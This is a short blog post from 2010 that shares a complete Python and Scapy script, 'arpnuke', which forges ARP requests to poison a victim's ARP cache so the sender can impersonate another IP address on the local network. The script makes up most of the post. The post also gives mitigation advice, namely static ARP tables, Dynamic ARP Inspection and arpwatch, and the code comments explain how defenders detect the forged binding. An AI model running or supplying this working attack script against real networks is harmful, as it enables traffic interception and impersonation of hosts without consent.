Monday, July 12, 2010

ARP Cache Poisoning

Here is a simple script I wrote in Python. It performs an ARP poisoning attack by sending a forged ARP request packet.
The syntax is "arpnuke [interface] [victim IP] [IP to masquerade as]".
It must be run as root, and Scapy must be installed.
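The best way to mitigate this attack is with static ARP tables. See the man page for arp and the ifconfig -arp option for more info. Static entries have to be maintained by hand on every host, so on larger networks it is worth adding switch-side Dynamic ARP Inspection and a monitor such as arpwatch, which reports when an IP address suddenly maps to a different MAC address.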


#!/usr/bin/python

import os
import subprocess
import sys

from scapy.all import Ether,ARP,conf,sendp

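# Command line: arpnuke [interface] [victim IP] [IP to masquerade as]
if len(sys.argv) < 4:
    sys.stderr.write('usage: arpnuke [interface] [victim IP] [IP to masquerade as]\n')
    sys.exit(2)

interface = sys.argv[1]
victim = sys.argv[2]
identity = sys.argv[3]

# The script runs as root and these values are handed to external programs,
# so refuse anything one of those programs could read as an option.
for _arg in (interface, victim, identity):
    if _arg.startswith('-'):
        sys.stderr.write('arpnuke: invalid argument: %r\n' % _arg)
        sys.exit(2)

conf.iface = interface
print(conf.iface)

# Check whether the kernel ARP table already mentions the victim. The table is
# read directly instead of through `cat ... | grep <argv>` in a shell: that
# string was built from unquoted command-line input and executed as root.
try:
    with open('/proc/net/arp') as arp_table:
        cached = [entry for entry in arp_table if victim in entry]
except IOError:
    cached = []

# Echo the matching entries, as the grep in the shell pipeline did.
sys.stdout.write(''.join(cached))

if not cached:
    # No cached entry yet: have arping resolve the victim so the table gets
    # one. Arguments go in as a list, so nothing in them reaches a shell.
    try:
        subprocess.call(['arping', '-f', '-I', interface, victim])
    except OSError:
        sys.stderr.write('arpnuke: could not run arping\n')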

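def local_mac(iface):
    """Return the hardware (MAC) address that ifconfig reports for iface.

    ifconfig is run directly with an argument list: no shell and no scratch
    file. The script runs as root and iface comes straight from the command
    line, so the earlier shell pipeline let metacharacters in the argument
    execute as root, and its fixed /tmp/.arpnuketmp path could be pre-created
    (for example as a symlink) by another local user. The old version also
    never closed the file, because close() sat after the return.

    Returns the 11th space-separated field of the first output line that
    contains "HWaddr" (the field `cut -d" " -f11` selected), or '' when
    ifconfig is missing, fails, or prints no such line.
    """
    # An interface name that looks like an option would change what ifconfig does.
    if iface.startswith('-'):
        return ''
    try:
        output = subprocess.check_output(['ifconfig', iface],
                                         universal_newlines=True)
    except (OSError, subprocess.CalledProcessError):
        return ''
    for line in output.splitlines():
        if 'HWaddr' in line:
            fields = line.split(' ')
            # The field position is tied to the legacy net-tools output layout.
            return fields[10] if len(fields) > 10 else ''
    return ''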

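def neigh_mac(ip):
    """Return the MAC address listed for ip in the output of `arp -na`.

    arp is run directly with a fixed argument list and its output is filtered
    in Python, so ip never reaches a shell. The earlier version spliced the
    unquoted command-line value into a root shell pipeline and wrote the
    result to the predictable path /tmp/.arpnuketmp; it also never closed the
    file, because close() sat after the return.

    ip is matched as a literal substring of each line (the shell version
    handed it to grep as a regular expression) and the first hit wins.
    Returns the 4th space-separated field of that line, or '' when arp is
    missing, fails, or lists no matching entry.
    """
    try:
        output = subprocess.check_output(['arp', '-na'],
                                         universal_newlines=True)
    except (OSError, subprocess.CalledProcessError):
        return ''
    for line in output.splitlines():
        if ip in line:
            fields = line.split(' ')
            return fields[3] if len(fields) > 3 else ''
    return ''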

# Link-layer addresses: the victim's from the local ARP cache, this host's
# from the chosen interface.
destmac = neigh_mac(victim)
srcmac = local_mac(interface)

# Ethernet header addressed to the victim; EtherType 0x0806 marks the payload
# as ARP.
ether = Ether(src=srcmac, dst=destmac, type=0x0806)

# ARP request (op=1) whose sender fields pair this host's MAC address with the
# masqueraded IP address. On the defending side, that changed IP-to-MAC
# binding is what monitors such as arpwatch report and what switch-side
# Dynamic ARP Inspection is designed to drop.
arp = ARP(op=1, hwsrc=srcmac, psrc=identity, hwdst=destmac, pdst=victim)

sendp(ether / arp)
